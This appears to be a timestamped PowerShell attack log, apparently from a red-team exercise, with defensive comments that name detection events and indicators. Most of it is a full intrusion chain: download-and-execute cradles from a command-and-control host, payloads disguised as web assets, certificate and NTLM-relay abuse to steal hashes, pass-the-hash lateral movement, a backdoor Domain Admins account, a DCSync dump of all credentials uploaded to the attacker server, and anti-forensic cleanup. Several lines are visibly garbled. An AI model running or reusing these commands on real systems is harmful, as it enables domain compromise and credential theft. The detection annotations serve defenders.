2024-04-23 AM 5:52:56.575
# Download cradle: remote content is fetched and handed straight to IEX (no file touches disk).
# The missing "." between the WebClient object and downloadstring, and the <...> around the URL,
# look like rendering artifacts of this listing rather than the command as it was executed.
# Detection: PowerShell script-block logging (4104) records the expanded content IEX evaluates;
# the host name c2-conf.berylia.org and the image-named path are IoCs for proxy/DNS logs.
IEX (New-Object 'Net.Webclient')downloadstring.Invoke('<https://c2-conf.berylia.org/media/bglayer.png>')
https://c2-conf.berylia.org/media/bglayer.png 다운로드 및 실행
# Second stage loaded from the same host, again via an in-memory IEX cradle.
IEX (New-Object 'Net.Webclient')downloadstring.Invoke('<https://c2-conf.berylia.org/css/bxslider.min.css>');
# Invoke-Runas is not a built-in cmdlet; presumably defined by a stage loaded above — confirm from the stage content.
# A cleartext password and a misspelled account name ('admnistrator' — typo or a deliberately
# named account in this environment, cannot tell from here) sit on the command line, so both are
# captured verbatim by process-creation logging with command-line auditing (4688) and by 4104.
Invoke-Runas -LogonType 2 -Binary 'cmd.exe' -Password 'Red.Alert.58!' -Args '/c =' -User 'admnistrator';
# Short pause, then a third stage is evaluated in memory.
Start-Sleep -Seconds 5;IEX (New-Object 'Net.Webclient')downloadstring.Invoke('<https://c2-conf.berylia.org/media/mwfmdl2-v2.81.woff2>');
logo32, logo64 다운로드
# Two payloads named like images are downloaded and dot-sourced as script blocks (in-memory execution).
"logo32.png", "logo64.png" | % {. ([ScriptBlock]::Create((New-Object Net.WebClient).DownloadString("<https://c2-conf.berylia.org/img/${_}>")))};
# URLs named as JavaScript files are written to disk as .exe under Public\Public Images — an
# extension/content mismatch. That directory is the staging area for everything below.
# Doubled backslashes in paths throughout this listing are most likely a rendering artifact.
# Detection: Sysmon 11 (FileCreate) / 4663 on this directory; the .exe names are host IoCs.
iwr -uri <https://c2-conf.berylia.org/js/jquery.min.js> -OutFile "C:\\Users\\Public\\Public Images\\rdpinit64.exe" -useb;
iwr -uri <https://c2-conf.berylia.org/js/bootstrap.min.js> -OutFile "C:\\Users\\Public\\Public Images\\pcaiu.exe" -useb;
# Domain and DC FQDN derived from the environment: LOGONSERVER is of the form \\NAME, so after
# splitting on the backslash, index [2] is the host name.
$domain = $env:USERDNSDOMAIN;
$dcfqdn = ($env:LOGONSERVER).split("\\\\")[2] + "." + $env:USERDNSDOMAIN;
# Credential object built from the same cleartext password used above.
$cred = New-Object System.Management.Automation.PSCredential("admnistrator", $("Red.Alert.58!" | ConvertTo-SecureString -AsPlainText -Force));
# Runs the two staged binaries locally as SYSTEM (Invoke-CommandAs is not built in; presumably from an earlier stage).
# First binary: "add /target:helpdesk.user /password /path:cert.pfx" — writes a certificate for another user's
# account (the syntax resembles a certificate-management tool; tool identity not confirmed on this page).
# Second binary: "asktgt /certificate ... /getcredentials /show" — a certificate-based Kerberos ticket request
# whose output includes an NTLM line, which is the only line kept. Syntax resembles a Kerberos ticket tool.
# Detection: on the DC, 4768 events carrying certificate information for helpdesk.user from this host.
$hash_line = Invoke-CommandAs -ComputerName 127.0.0.1 -ScriptBlock {. "C:\\Users\\Public\\Public Images\\rdpinit64.exe" add /target:helpdesk.user /password:"123" /path:"C:\\Users\\Public\\Public Images\\cert.pfx"; . "C:\\Users\\Public\\Public Images\\pcaiu.exe" asktgt /user:helpdesk.user /certificate:"C:\\Users\\Public\\Public Images\\cert.pfx" /password:"123" /domain:$domain /dc:$dcfqdn /getcredentials /show} -AsSystem -Credential $cred | select-string NTLM;
# Extracts the hash value from the "...: <hash>" line.
$hash = $hash_line.Line.Split(":")[1].trim();
# Five more CSS-named stages dot-sourced in memory.
"tabler.min.css", "leaflet.css", "toastify.css", "widgets.css", "fusion.css" | % {. ([ScriptBlock]::Create((New-Object Net.WebClient).DownloadString("<https://c2-conf.berylia.org/css/${_}>")))};
# Lateral movement to the DC with the recovered hash (-Hash, i.e. pass-the-hash), launching another
# IEX cradle there with -exec bypass. Invoke-SMBExec is not built in.
# Detection: NTLM network logon (4624, type 3) for helpdesk.user on the DC sourced from this workstation;
# SMB-exec style tools commonly install a transient service (7045) — worth checking on $dcfqdn.
Invoke-SMBExec -Target $dcfqdn -Domain $domain -Username helpdesk.user -Hash $hash -Command "powershell.exe -exec bypass -c IEX (New-Object Net.Webclient).downloadstring('<https://c2-conf.berylia.org/media/footer-social.png>');" -Verbose;
Start-Sleep -Seconds 5;
-----------------------------------------------------
# Persistence: creates a new domain account and places it in Domain Admins.
# ${TRuE} is the automatic variable $true written with brace syntax and mixed case (PowerShell
# variable names are case-insensitive) — a string-matching evasion cue, not a different value.
# Detection: 4720 (user created) followed by 4728 (member added to a global security group) for
# 'automation.user'; review any account created outside the provisioning process.
New-ADUser -AccountPassword $(ConvertTo-SecureString 'TFighterX022024!' -AsPlainText -Force) -SamAccountName 'automation.user' -Name 'automation.user' -Enabled ${TRuE};
Add-ADGroupMember -Identity 'Domain Admins' -Members 'automation.user';
logo32.png
logo64.png
2024-04-23 AM 5:53:03.443
# Decoy-document sequence: a PNG-named download is saved as Document.doc and opened, presumably so
# the user sees a document while the rest runs (what the document contains is not shown here).
mkdir "C:\\Users\\Public\\Public Images";
iwr -uri <https://c2-conf.berylia.org/upload/img/background.png> -OutFile "C:\\Users\\Public\\Public Images\\Document.doc" -useb;
Start-Process "C:\\Users\\Public\\Public Images\\Document.doc";
Start-Sleep -Seconds 15;
# Word is force-killed after 15 s; Detection: WINWORD terminated by powershell.exe (Sysmon 1/5 parent-child).
Get-Process | ?{$_.ProcessName -eq "WINWORD"} | Stop-Process -Force;
Start-Sleep -Seconds 5;
# cmd.exe -> powershell.exe -exec bypass with an IEX cradle, working directory set to the staging
# folder. The argument string is printed on the next line in this listing; treat both lines as one statement.
Start-Process -FilePath cmd.exe -ArgumentList
"/c powershell.exe -exec bypass -c cd 'c:\\Users\\Public\\Public Images\\'; IEX (New-Object Net.Webclient).downloadstring('<https://c2-conf.berylia.org/media/profile.png>');"
Document.doc 다운로드 및 실행
profile.png 다운로드 및 실행
# Repeat of the stage/run-as/stage sequence seen earlier in this timeline (same URLs, same account).
IEX (New-Object 'Net.Webclient')downloadstring.Invoke('<https://c2-conf.berylia.org/css/bxslider.min.css>');
# Invoke-Runas is not built in; cleartext password and the 'admnistrator' name are on the command line (4688/4104).
Invoke-Runas -LogonType 2 -Binary 'cmd.exe' -Password 'Red.Alert.58!' -Args '/c =' -User 'admnistrator';
Start-Sleep -Seconds 5;IEX (New-Object 'Net.Webclient')downloadstring.Invoke('<https://c2-conf.berylia.org/media/mwfmdl2-v2.81.woff2>');
mwfmdl2-v2.81.woff2
# Three more JS/CSS-named downloads staged as .exe files (sdiaghost.exe, tcbllaunch.exe, pcaiu.exe).
iwr -uri <https://c2-conf.berylia.org/js/chunk4867.min.js> -OutFile "C:\\Users\\Public\\Public Images\\sdiaghost.exe" -useb;
iwr -uri <https://c2-conf.berylia.org/js/sigma.js> -OutFile "C:\\Users\\Public\\Public Images\\tcbllaunch.exe" -useb;
iwr -uri <https://c2-conf.berylia.org/js/bootstrap.min.js> -OutFile "C:\\Users\\Public\\Public Images\\pcaiu.exe" -useb;
# Target names derived from the current domain: the parent domain (first label dropped), a DC named
# dc01-conf in it, a plain-HTTP URL to a host named ca01-conf, and two IPs built from the 5th label
# of the domain (assumes the domain has at least five labels — an exercise-specific naming scheme).
$domain = $env:USERDNSDOMAIN;
$parent_domain = ($domain -split "\\." | Select-Object -Skip 1) -join ".";
$parent_dc_fqdn = "dc01-conf." + $parent_domain;
$url = "<http://ca01-conf>." + $parent_domain + "/";
$dc_ip = "10." + $domain.Split(".")[4] + ".32.11";
$ws_ip = "10." + $domain.Split(".")[4] + ".32.14";
# Retry loop: each iteration (1) starts a background "relay" pointed at the ca01-conf URL requesting a
# DomainController-template certificate, (2) runs tcbllaunch.exe with the DC and workstation IPs ten
# times, and (3) checks whether an NTLM-hash line can be obtained with the resulting .pfx.
# This sequence is consistent with an NTLM relay against a CA's HTTP enrollment endpoint, with the
# DC coerced into authenticating to this host — tool identities are not confirmed on this page.
# Detection: CA request/issuance audit events (4886/4887) on ca01-conf for a DomainController-template
# request that did not originate from a DC; NTLM authentication from the DC's machine account to a
# workstation IP; the base64 "-e" command line below is visible in 4688/4104.
$hash_line = $null
do {
$command = ". 'C:\\Users\\Public\\Public Images\\sdiaghost.exe' relay -target $url -template DomainController -out 'C:\\Users\\Public\\Public Images\\dc01-conf'";
# Relay command is base64 (UTF-16LE) encoded and run detached — the encoding is a logging-evasion cue, not a behavior change.
$encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command));
Start-Process -NoNewWindow -FilePath powershell.exe -ArgumentList "-e $encoded"
sleep 2;
# Trigger attempts with increasing back-off (sleep $i).
for ($i = 0; $i -lt 10; $i++) {
. "C:\\Users\\Public\\Public Images\\tcbllaunch.exe" $dc_ip $ws_ip
sleep $i;
}
# "auth -pfx ... -dc-ip" with the obtained certificate; the filter string is the well-known empty LM
# hash, i.e. it selects a line of the form LM:NT — only present once the certificate worked.
$hash_line = . "C:\\Users\\Public\\Public Images\\sdiaghost.exe" auth -pfx "C:\\Users\\Public\\Public Images\\dc01-conf.pfx" -dc-ip $dc_ip | Select-String "aad3b435b51404eeaad3b435b51404ee";
sleep 2;
} while ([string]::IsNullOrEmpty($hash_line))
# NT hash is the last colon-separated field; it is then used to request a TGT for the DC machine
# account (dc01-conf$) with an RC4 key and inject it into this session (/ptt).
# Detection: 4768 for dc01-conf$ with RC4 (etype 0x17) from a workstation IP rather than the DC itself.
$hash_line = $hash_line.Line.Split(":")[-1].trim();
. 'C:\\Users\\Public\\Public Images\\pcaiu.exe' asktgt /user:dc01-conf$ /domain:$parent_domain /rc4:$hash_line /ptt;
# Staging directory wiped (anti-forensics). The file names above remain useful for Prefetch/Amcache/
# Sysmon 11 correlation even after deletion.
Get-ChildItem -Path "C:\\Users\\Public\\Public Images\\" | Remove-Item -Force;
Remove-Item -Path "C:\\Users\\Public\\Public Images\\" -Recurse -Force;
# Remote execution on the parent DC (Invoke-Command, i.e. WinRM) using the injected ticket, launching
# another IEX cradle there. Detection: inbound WinRM (5985/5986) to dc01-conf from a workstation;
# Kerberos logon on the DC as dc01-conf$ from a non-DC source.
Invoke-Command -ComputerName $parent_dc_fqdn -ScriptBlock {IEX (New-Object Net.Webclient).downloadstring("<https://c2-conf.berylia.org/media/fa-solid-900.woff>")}
fa-solid-900.woff
# Presumably executed on the parent DC reached above (inferred from the sequence; not stated on the page).
# Staging directory recreated; two more stages evaluated via IEX (iwr ...).
mkdir "C:\\Users\\Public\\Public Images";
IEX (iwr '<https://c2-conf.berylia.org/css/style.css>');
# Encrypt-Data is not a built-in cmdlet; presumably defined by the stage just loaded — its effect is not shown here.
Encrypt-Data;
iwr -uri <https://c2-conf.berylia.org/js/bootstrap.min.js> -OutFile "C:\\Users\\Public\\Public Images\\pcaiu.exe" -useb;
iwr -uri <https://c2-conf.berylia.org/css/onepick.css> -OutFile "C:\\Users\\Public\\Public Images\\wausevr.exe" -useb;
IEX (iwr '<https://c2-conf.berylia.org/css/bootstrap.min.css>');
$domain = $env:USERDNSDOMAIN;
$user = "administrator@" + $domain;
$ca = "ca01-conf." + $domain;
# "lsadump::dcsync /all /csv" — replication-based dump of every account's secrets to file.txt (the
# syntax resembles a well-known credential-dumping tool; identity not confirmed on this page).
# Detection: 4662 on the DC with replication control-access rights (DS-Replication-Get-Changes*)
# requested by an account/host that is not a DC; file.txt creation in the staging folder.
. 'C:\\Users\\Public\\Public Images\\wausevr.exe' "lsadump::dcsync /domain:$domain /all /csv" "exit" > "C:\\Users\\Public\\Public Images\\file.txt";
# Exfiltration: the dump is uploaded to the C2 upload endpoint, named after the 4th domain label.
# Upload-File is not built in. Detection: HTTPS POST to c2-conf.berylia.org/fileupload.php from a DC.
$filename = "credentials-" + $domain.Split(".")[3];
Upload-File -UploadUrl "<https://c2-conf.berylia.org/fileupload.php>" -FilePath "C:\\Users\\Public\\Public Images\\file.txt" -FileName $filename;
# Single-account DCSync for administrator; the "Hash NTLM" line is parsed and used for an RC4 TGT
# request injected into the session (/ptt). Detection: 4768 for administrator with etype 0x17.
$hash_data = . 'C:\\Users\\Public\\Public Images\\wausevr.exe' "lsadump::dcsync /user:$user /domain:$domain" "exit" | sls "Hash NTLM" | Out-String;
$hash = $hash_data.Split(":")[1].trim();
. 'C:\\Users\\Public\\Public Images\\pcaiu.exe' asktgt /user:administrator /rc4:$hash /ptt;
# Remote execution on the CA host (WinRM) with yet another IEX cradle.
Invoke-Command -ComputerName $ca -ScriptBlock {IEX (New-Object Net.Webclient).downloadstring("<https://c2-conf.berylia.org/media/goog-ads.jpg>")};
# Staging directory wiped again. The trailing "mm" after the semicolon looks like a stray artifact of the listing.
Remove-Item -Path "C:\\Users\\Public\\Public Images\\" -Recurse -Force;mm